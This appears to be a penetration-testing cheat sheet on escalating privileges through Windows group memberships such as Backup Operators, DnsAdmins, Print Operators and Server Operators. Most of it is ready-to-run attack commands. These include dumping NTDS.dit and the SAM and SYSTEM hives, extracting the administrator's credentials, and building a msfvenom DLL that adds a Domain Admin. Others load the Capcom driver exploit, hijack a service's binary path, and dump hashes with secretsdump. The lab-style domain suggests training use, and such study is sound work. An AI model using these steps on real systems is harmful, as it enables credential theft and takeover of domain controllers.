Windows Group Privileges

Backup Operators

Membership of this group grants its members the SeBackup and SeRestore privileges.

https://github.com/giuliano108/SeBackupPrivilege

1 Import DLLs

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

2 Enable SebackupPrivilege

# Enable
Set-SeBackupPrivilege

# Verufy
Get-SeBackupPrivilege

3 Copy File

copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Copy NTDS.dit

diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Backup SAM + SYSTEM Hives

reg save HKLM\SYSTEM SYSTEM.SAV

reg save HKLM\SAM SAM.SAV

Extract NTDS

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

Event Log Reader

Check Membership Group

net localgroup "Event Log Readers"

Searching Security Logs

# Without Credentials
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# With Credentials
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

1 Generating Malicious DLL

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

2 Load DLL

dnscmd.exe /config /serverlevelplugindll adduser.dll

3 Restart Service

sc stop dns
sc start dns

Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp

1 Compile CPP File

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

2 Add Capcop.sys

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

3 Verify Privilege Enables

EnableSeLoadDriverPrivilege.exe

4 Run Exploit

https://github.com/tandasat/ExploitCapcom

.\ExploitCapcom.exe

Server Operators

Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

1 Query Service

# Check if it's SYSTEM
sc qc AppReadiness

2 Service Permissions Check

https://learn.microsoft.com/en-us/sysinternals/downloads/psservice

c:\Tools\PsService.exe security AppReadiness

3 Modify Service Binary Path

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

4 Start / Stop Service

sc stop AppReadiness
sc start AppReadiness

5 Dump Hashes

secretsdump.py [email protected] -just-dc-user administrator
PreviousWindows User PrivilegesNextManual Enumeration

Last updated